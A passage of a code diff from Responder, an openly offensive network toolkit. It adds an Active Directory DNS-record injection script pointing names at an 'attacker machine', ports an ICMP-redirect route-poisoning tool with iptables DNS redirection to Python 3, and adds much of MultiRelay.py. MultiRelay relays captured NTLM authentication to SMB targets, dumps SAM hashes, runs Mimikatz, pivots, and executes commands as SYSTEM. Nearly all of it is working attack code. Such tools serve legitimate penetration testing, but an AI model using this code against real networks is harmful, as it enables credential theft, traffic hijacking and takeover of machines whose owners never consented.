+class DNS_RPC_RECORD_TS(Structure):
+    """
+    DNS_RPC_RECORD_TS [MS-DNSP] section 2.2.2.2.4.23
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('entombedTime', '<Q'),
+    )
+
+def getserial(server, zone):
+    dnsresolver = dns.resolver.Resolver()
+    try:
+        socket.inet_aton(server)
+        dnsresolver.nameservers = [server]
+    except socket.error:
+        pass
+    res = dnsresolver.query(zone, 'SOA')
+    for answer in res:
+        return answer.serial + 1
+
+def new_A_record(type, serial):
+    nr = DNS_RECORD()
+    nr['Type'] = type
+    nr['Serial'] = serial
+    nr['TtlSeconds'] = 180
+    nr['Rank'] = 240
+    return nr
+
+ddict1 = defaultdict(list)
+
+parser = argparse.ArgumentParser(description='Add/ Remove DNS records for an effective pawning with responder')
+    
+parser.add_argument("-DNS", type=str,help="IP address of the DNS server/ Domain Controller to connect to")
+parser.add_argument("-u","--user",type=str,help="Domain\\Username for authentication.")
+parser.add_argument("-p","--password",type=str,help="Password or LM:NTLM hash, will prompt if not specified")
+parser.add_argument("-a", "--action", type=str, help="ad, rm, or an: add, remove, analyze")
+parser.add_argument("-r", "--record", type=str, help="DNS record name")
+parser.add_argument("-d", "--data", help="The IP address of attacker machine")
+parser.add_argument("-l", "--logfile", type=str, help="The log file of Responder in analyze mode")
+
+
+
+args = parser.parse_args()
+#Checking Username and Password
+if args.user is not None:
+    if not '\\' in args.user:
+        print('Username must include a domain, use: Domain\\username')
+        sys.exit(1)
+    if args.password is None:
+        args.password = getpass.getpass()
+
+#Check the required arguments
+if args.action in ['ad', 'rm']:
+    if args.action == 'ad' and not args.record:
+        flag = input("No record provided, Enter 'Y' to add a Wildcard record: ")
+        if flag.lower() == 'y' or flag.lower() == 'yes':
+            recordname = "*"
+        else:
+            sys.exit(1)     
+    else:
+        recordname = args.record
+    if args.action == 'ad' and not args.data:
+        print("Provide an IP address with argument -d")
+        sys.exit(1)
+    if args.action == "rm" and not args.record:
+        print("No record provided to be deleted")
+elif args.action == "an":
+    if args.logfile:
+        with open(args.logfile) as infile:
+            for lline in infile:
+                templist = lline.split(":")
+                tempIP = templist[2].split( )[0]
+                tempRecord = templist[3].split( )[0]
+                ddict1[tempRecord].append(tempIP)
+        infile.close()
+        for k,v in ddict1.items():
+            print("The request %s was made by %s hosts" % (k, len(set(v))))
+        sys.exit(0)
+    else:
+        print("Provide a log file from responder session in analyze mode")
+        sys.exit(1)
+else:
+    print("Choose one of the three actions")
+    sys.exit(1)
+
+#inital connection
+dnserver = ldap3.Server(args.DNS, get_info=ldap3.ALL)
+print('Connecting to host...')
+con = ldap3.Connection(dnserver, user=args.user, password=args.password, authentication=ldap3.NTLM)
+print('Binding to host')
+# Binding with the user context 
+if not con.bind():
+    print('Bind failed, Check the Username and Password')
+    print(con.result)
+    sys.exit(1)
+print('Bind OK')
+
+#Configure DN for the record, gather domainroot, dnsroot, zone
+domainroot = dnserver.info.other['defaultNamingContext'][0]
+dnsroot = 'CN=MicrosoftDNS,DC=DomainDnsZones,%s' % domainroot
+zone = re.sub(',DC=', '.', domainroot[domainroot.find('DC='):], flags=re.I)[3:]
+if recordname.lower().endswith(zone.lower()):
+    recordname = recordname[:-(len(zone)+1)]
+record_dn = 'DC=%s,DC=%s,%s' % (recordname, zone, dnsroot)
+
+if args.action == 'ad':
+    record = new_A_record(1, getserial(args.DNS, zone))
+    record['Data'] = DNS_RPC_RECORD_A()
+    record['Data'] = socket.inet_aton(args.data)
+
+    #Adding the data to record object
+    recorddata = {
+        #'objectClass': ['top', 'dnsNode'],
+        'dNSTombstoned': False,
+        'name': recordname,
+        'dnsRecord': [record.getData()]
+        }
+    objectClass = ['top', 'dnsNode']
+
+    print('Adding the record')
+
+    con.add(record_dn, objectClass, recorddata)
+    #con.add(record_dn, ['top', 'dnsNode'], recorddata)
+    print(con.result)
+
+elif args.action == 'rm':
+    #searching for the record
+    searchbase = 'DC=%s,%s' % (zone, dnsroot)
+    con.search(searchbase, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(recordname), attributes=['dnsRecord','dNSTombstoned','name'])
+    if len(con.response) != 0:
+        for entry in con.response:
+            if entry['type'] != 'searchResEntry':
+                print("Provided record does not exists")
+                sys.exit(1)
+            else:
+                record_dn = entry['dn']
+                print(entry['raw_attributes']['dnsRecord'])
+    else:
+        print("Provided record does not exists")
+
+    con.delete(record_dn)
+    if con.result['description'] == "success":
+        print("Record deleted successfully")
+        

tools/FindSMB2UPTime.py

@@ -1,68 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys
-import os
-import datetime
-import struct
-import socket
-
-sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
-from packets import SMB2Header, SMB2Nego, SMB2NegoData
-
-def GetBootTime(data):
-    Filetime = int(struct.unpack('<q',data)[0])
-    t = divmod(Filetime - 116444736000000000, 10000000)
-    time = datetime.datetime.fromtimestamp(t[0])
-    return time, time.strftime('%Y-%m-%d %H:%M:%S')
-
-
-def IsDCVuln(t):
-    Date = datetime.datetime(2014, 11, 17, 0, 30)
-    if t[0] < Date:
-       print "DC is up since:", t[1]
-       print "This DC is vulnerable to MS14-068"
-    print "DC is up since:", t[1]
-
-
-def run(host):
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(host)  
-    s.settimeout(5) 
-
-    Header = SMB2Header(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
-    Nego = SMB2Nego(Data = SMB2NegoData())
-    Nego.calculate()
-
-    Packet = str(Header)+str(Nego)
-    Buffer = struct.pack(">i", len(Packet)) + Packet
-    s.send(Buffer)
-
-    try:
-        data = s.recv(1024)
-        if data[4:5] == "\xff":
-           print "This host doesn't support SMBv2" 
-        if data[4:5] == "\xfe":
-           IsDCVuln(GetBootTime(data[116:124]))
-    except Exception:
-        s.close()
-        raise
-
-if __name__ == "__main__":
-    if len(sys.argv)<=1:
-        sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
-    host = sys.argv[1],445
-    run(host)

tools/FindSQLSrv.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,25 +16,23 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from socket import *
 
-print 'MSSQL Server Finder 0.1'
+print('MSSQL Server Finder 0.3')
 
 s = socket(AF_INET,SOCK_DGRAM)
 s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
-s.settimeout(2)
-s.sendto('\x02',('255.255.255.255',1434))
+s.settimeout(5)
+s.sendto(b'\x02',('255.255.255.255',1434))
 
 try:
-   while 1:
-      data, address = s.recvfrom(8092)
-      if not data:
-         break
-      else:
-         print "==============================================================="
-         print "Host details:",address[0]
-         print data[2:]
-         print "==============================================================="
-         print ""
+    while 1:
+        data, address = s.recvfrom(8092)
+        if not data:
+            break
+        else:
+            print("===============================================================")
+            print(("Host details: %s"%(address[0])))
+            print((data[2:]).decode('latin-1'))
+            print("===============================================================")
+            print("")
 except:
-   pass
-
-
+    pass

tools/Icmp-Redirect.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -19,14 +19,16 @@ import struct
 import optparse
 import pipes
 import sys
+import codecs
 from socket import *
 sys.path.append('../')
 from odict import OrderedDict
 from random import randrange
 from time import sleep
 from subprocess import call
-from packets import Packet
 
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
 parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
                                prog=sys.argv[0],
                                )
@@ -40,23 +42,23 @@ parser.add_option('-a', '--alternate',action="store", help="The alternate gatewa
 options, args = parser.parse_args()
 
 if options.OURIP is None:
-    print "-i mandatory option is missing.\n"
+    print("-i mandatory option is missing.\n")
     parser.print_help()
     exit(-1)
 elif options.OriginalGwAddr is None:
-    print "-g mandatory option is missing, please provide the original gateway address.\n"
+    print("-g mandatory option is missing, please provide the original gateway address.\n")
     parser.print_help()
     exit(-1)
 elif options.VictimIP is None:
-    print "-t mandatory option is missing, please provide a target.\n"
+    print("-t mandatory option is missing, please provide a target.\n")
     parser.print_help()
     exit(-1)
 elif options.Interface is None:
-    print "-I mandatory option is missing, please provide your network interface.\n"
+    print("-I mandatory option is missing, please provide your network interface.\n")
     parser.print_help()
     exit(-1)
 elif options.ToThisHost is None:
-    print "-r mandatory option is missing, please provide a destination target.\n"
+    print("-r mandatory option is missing, please provide a destination target.\n")
     parser.print_help()
     exit(-1)
 
@@ -78,13 +80,53 @@ def Show_Help(ExtraHelpData):
 
 MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
 
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
 def GenCheckSum(data):
     s = 0
     for i in range(0, len(data), 2):
         q = ord(data[i]) + (ord(data[i+1]) << 8)
         f = s + q
         s = (f & 0xffff) + (f >> 16)
-    return struct.pack("<H",~s & 0xffff)
+    return StructWithLenPython2or3("<H",~s & 0xffff)
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
 
 #####################################################################
 #ARP Packets
@@ -110,8 +152,8 @@ class ARPWhoHas(Packet):
     ])
 
     def calculate(self):
-        self.fields["DstIP"] = inet_aton(self.fields["DstIP"])
-        self.fields["SenderIP"] = inet_aton(OURIP)
+        self.fields["DstIP"] = inet_aton(self.fields["DstIP"]).decode('latin-1')
+        self.fields["SenderIP"] = inet_aton(OURIP).decode('latin-1')
 
 #####################################################################
 #ICMP Redirect Packets
@@ -141,11 +183,11 @@ class IPPacket(Packet):
 
     def calculate(self):
         self.fields["TID"] = chr(randrange(256))+chr(randrange(256))
-        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"]))
-        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"]))
+        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"])).decode('latin-1')
+        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"])).decode('latin-1')
         # Calc Len First
         CalculateLen = str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])+str(self.fields["Data"])
-        self.fields["Len"] = struct.pack(">H", len(CalculateLen))
+        self.fields["Len"] = StructWithLenPython2or3(">H", len(CalculateLen))
         # Then CheckSum this packet
         CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])
         self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
@@ -160,7 +202,7 @@ class ICMPRedir(Packet):
     ])
 
     def calculate(self):
-        self.fields["GwAddr"] = inet_aton(OURIP)
+        self.fields["GwAddr"] = inet_aton(OURIP).decode('latin-1')
         CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
         self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
 
@@ -177,27 +219,27 @@ def ReceiveArpFrame(DstAddr):
     s.settimeout(5)
     Protocol = 0x0806
     s.bind((Interface, Protocol))
-    OurMac = s.getsockname()[4]
+    OurMac = s.getsockname()[4].decode('latin-1')
     Eth = EthARP(SrcMac=OurMac)
     Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac)
     Arp.calculate()
     final = str(Eth)+str(Arp)
     try:
-        s.send(final)
+        s.send(NetworkSendBufferPython2or3(final))
         data = s.recv(1024)
         DstMac = data[22:28]
-        DestMac = DstMac.encode('hex')
-        PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
-        return PrintMac,DstMac
+        DestMac = codecs.encode(DstMac, 'hex')
+        PrintMac = ":".join([DestMac[x:x+2].decode('latin-1') for x in range(0, len(DestMac), 2)])
+        return PrintMac,DstMac.decode('latin-1')
     except:
-        print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
+        print("[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr))
         exit(1)
 
 def IcmpRedirectSock(DestinationIP):
     PrintMac,DestMac = ReceiveArpFrame(VictimIP)
-    print '[ARP]Target Mac address is :',PrintMac
+    print('[ARP]Target Mac address is :',PrintMac)
     PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
-    print '[ARP]Router Mac address is :',PrintMac
+    print('[ARP]Router Mac address is :',PrintMac)
     s = socket(AF_PACKET, SOCK_RAW)
     Protocol = 0x0800
     s.bind((Interface, Protocol))
@@ -209,12 +251,12 @@ def IcmpRedirectSock(DestinationIP):
     IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
     IPPack.calculate()
     final = str(Eth)+str(IPPack)
-    s.send(final)
-    print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
+    s.send(NetworkSendBufferPython2or3(final))
+    print('\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP))
 
 def FindWhatToDo(ToThisHost2):
     if ToThisHost2 != None:
-        Show_Help('Hit CRTL-C to kill this script')
+        Show_Help('Hit CTRL-C to kill this script')
         RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
     if ToThisHost2 == None:
         Show_Help(MoreHelp)
@@ -227,11 +269,11 @@ def RunThisInLoop(host, host2, ip):
     ouripadd = pipes.quote(ip)
     call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
     call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
-    print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
+    print("[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers.")
     while True:
         IcmpRedirectSock(DestinationIP=dns1)
         IcmpRedirectSock(DestinationIP=dns2)
-        print "[+]Repoisoning the target in 8 minutes..."
+        print("[+]Repoisoning the target in 8 minutes...")
         sleep(480)
 
 FindWhatToDo(ToThisHost2)

tools/MultiRelay.py

@@ -0,0 +1,853 @@
+#!/usr/bin/env python
+# -*- coding: latin-1 -*-
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+    sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...")
+import re
+import os
+import logging
+import optparse
+import time
+import random
+import subprocess
+from threading import Thread
+if PY2OR3 == "PY3":
+    from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+else:
+    from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+
+try:
+    from Crypto.Hash import MD5
+except ImportError:
+    print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
+    print("You can install it on debian based os with this command: apt-get install python-crypto")
+    print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
+try:
+    import readline
+except:
+    print("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
+    pass
+from MultiRelay.RelayMultiPackets import *
+from MultiRelay.RelayMultiCore import *
+from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
+sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
+from socket import *
+
+__version__ = "2.5"
+
+
+MimikatzFilename    = "./MultiRelay/bin/mimikatz.exe"
+Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
+RunAsFileName       = "./MultiRelay/bin/Runas.exe"
+SysSVCFileName      = "./MultiRelay/bin/Syssvc.exe"
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+if os.path.isfile(SysSVCFileName) is False:
+   print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1))
+   print(color("apt-get install gcc-mingw-w64-x86-64",2,1))
+   print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1))
+   print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1))
+   print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1))
+   sys.exit()
+
+def UserCallBack(op, value, dmy, parser):
+    args=[]
+    for arg in parser.rargs:
+        if arg[0] != "-":
+            args.append(arg)
+        if arg[0] == "-":
+            break
+    if getattr(parser.values, op.dest):
+        args.extend(getattr(parser.values, op.dest))
+    setattr(parser.values, op.dest, args)
+
+parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0])
+parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
+parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort")
+parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay")
+parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand")
+parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump")
+
+options, args = parser.parse_args()
+
+if options.TARGET is None:
+    print("\n-t Mandatory option is missing, please provide a target.\n")
+    parser.print_help()
+    exit(-1)
+if options.UserToRelay is None:
+    print("\n-u Mandatory option is missing, please provide a username to relay.\n")
+    parser.print_help()
+    exit(-1)
+if options.ExtraPort is None:
+    options.ExtraPort = 0
+
+if not os.geteuid() == 0:
+    print(color("[!] MultiRelay must be run as root."))
+    sys.exit(-1)
+
+OneCommand       = options.OneCommand
+Dump             = options.Dump
+ExtraPort        = options.ExtraPort
+UserToRelay      = options.UserToRelay
+
+Host             = [options.TARGET]
+Cmd              = []
+ShellOpen        = []
+Pivoting         = [2]
+
+def ShowWelcome():
+    print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
+    print('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
+    print('Usernames to relay (-u) are case sensitive.')
+    print('To kill this script hit CTRL-C.\n')
+    print(color('/*',8,1))
+    print('Use this script in combination with Responder.py for best results.')
+    print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
+    print('This tool listen on TCP port 80, 3128 and 445.')
+    print('For optimal pwnage, launch Responder only with these 2 options:')
+    print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
+    print('If you do so, use taskkill (as system) to kill the process.')
+    print(color('*/',8,1))
+    print(color('\nRelaying credentials for these users:',8,1))
+    print(color(UserToRelay,4,1))
+    print('\n')
+
+
+ShowWelcome()
+
+def ShowHelp():
+    print(color('Available commands:',8,0))
+    print(color('dump',8,1)+'               -> Extract the SAM database and print hashes.')
+    print(color('regdump KEY',8,1)+'        -> Dump an HKLM registry key (eg: regdump SYSTEM)')
+    print(color('read Path_To_File',8,1)+'  -> Read a file (eg: read /windows/win.ini)')
+    print(color('get  Path_To_File',8,1)+'  -> Download a file (eg: get users/administrator/desktop/password.txt)')
+    print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
+    print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
+    print(color('runas  Command',8,1)+'     -> Run a command as the currently logged in user. (eg: runas whoami)')
+    print(color('scan /24',8,1)+'           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
+    print(color('pivot  IP address',8,1)+'  -> Connect to another host (eg: pivot 10.0.0.12)')
+    print(color('mimi  command',8,1)+'      -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
+    print(color('mimi32  command',8,1)+'    -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
+    print(color('lcmd  command',8,1)+'      -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
+    print(color('help',8,1)+'               -> Print this message.')
+    print(color('exit',8,1)+'               -> Exit this shell and return in relay mode.')
+    print('                      If you want to quit type exit and then use CTRL-C\n')
+    print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
+
+Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
+Logs = logging
+Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+	if PY2OR3 == "PY2":
+		return str(data)
+	else:
+		return str(data.decode('latin-1'))
+
+def StructPython2or3(endian,data):
+	#Python2...
+	if PY2OR3 == "PY2":
+		return struct.pack(endian, len(data))
+	#Python3...
+	else:
+		return struct.pack(endian, len(data)).decode('latin-1')
+
+def UploadContent(File):
+    with open(File,'rb') as f:
+        s = f.read()
+    FileLen = len(s.decode('latin-1'))
+    FileContent = s.decode('latin-1')
+    return FileLen, FileContent
+
+try:
+    RunFinger(Host[0])
+except:
+    raise
+    print("The host %s seems to be down or port 445 down."%(Host[0]))
+    sys.exit(1)
+
+
+def get_command():
+    global Cmd
+    Cmd = []
+    while any(x in Cmd for x in Cmd) is False:
+        Cmd = [input("C:\\Windows\\system32\\:#")]
+
+#Function used to make sure no connections are accepted while we have an open shell.
+#Used to avoid any possible broken pipe.
+def IsShellOpen():
+    #While there's nothing in our array return false.
+    if any(x in ShellOpen for x in ShellOpen) is False:
+        return False
+    #If there is return True.
+    else:
+        return True
+
+#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
+def IsPivotOn():
+    #While there's nothing in our array return false.
+    if Pivoting[0] == "2":
+        return False
+    #If there is return True.
+    if Pivoting[0] == "1":
+        print("pivot is on")
+        return True
+
+def ConnectToTarget():
+    try:
+        s = socket(AF_INET, SOCK_STREAM)
+        s.connect((Host[0],445))
+        return s
+    except:
+        try:
+            sys.exit(1)
+            print("Cannot connect to target, host down?")
+        except:
+            pass
+
+class HTTPProxyRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+            if IsPivotOn():
+                return None
+        except:
+            raise
+
+        s = ConnectToTarget()
+        try:
+            data = self.request.recv(8092)
+            ##First we check if it's a Webdav OPTION request.
+            Webdav = ServeOPTIONS(data)
+            if Webdav:
+                #If it is, send the option answer, we'll send him to auth when we receive a profind.
+                self.request.send(Webdav)
+                data = self.request.recv(4096)
+
+            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+            ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
+            if NTLM_Auth:
+                #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
+                Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+            if Packet_NTLM == "\x01":
+                ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
+                h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
+                n = SMBNegoCairo(Data = SMBNegoCairoData())
+                n.calculate()
+                packet0 = str(h)+str(n)
+                buffer0 = longueur(packet0)+packet0
+                s.send(buffer0)
+                smbdata = s.recv(2048)
+                ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+                if smbdata[8:10] == "\x72\x00":
+                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
+                    t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+                    t.calculate()
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    s.send(NetworkSendBufferPython2or3(buffer1))
+                    smbdata = s.recv(2048) #got it here.
+
+                ## Send HTTP Proxy
+                Buffer_Ans = WPAD_NTLM_Challenge_Ans()
+                Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+                key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
+                self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+                data = self.request.recv(8092)
+                NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+                Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+                ##Got NTLM Message 3 from client.
+                if Packet_NTLM == "\x03":
+                    NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+                    ##Might be anonymous, verify it and if so, send no go to client.
+                    if IsSMBAnonymous(NTLM_Auth):
+                        Response = WPAD_Auth_407_Ans()
+                        self.request.send(str(Response))
+                        data = self.request.recv(8092)
+                else:
+                    #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                    #and has not attempted before. While at it, let's grab his hash.
+                    Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+                    if Username is not None:
+                        head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+                        t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+                        t.calculate()
+                        packet1 = str(head)+str(t)
+                        buffer1 = longueur(packet1)+packet1
+                        print("[+] SMB Session Auth sent.")
+                        s.send(NetworkSendBufferPython2or3(buffer1))
+                        smbdata = s.recv(2048)
+                        RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                        if RunCmd is None:
+                            s.close()
+                            self.request.close()
+                            return None
+
+            else:
+                ##Any other type of request, send a 407.
+                Response = WPAD_Auth_407_Ans()
+                self.request.send(str(Response))
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+
+class HTTPRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+            if IsPivotOn():
+                return None
+        except:
+            raise
+
+        try:
+            s = ConnectToTarget()
+
+            data = self.request.recv(8092)
+            ##First we check if it's a Webdav OPTION request.
+            Webdav = ServeOPTIONS(data)
+            if Webdav:
+                #If it is, send the option answer, we'll send him to auth when we receive a profind.
+                self.request.send(NetworkSendBufferPython2or3(Webdav))
+                data = self.request.recv(4096)
+
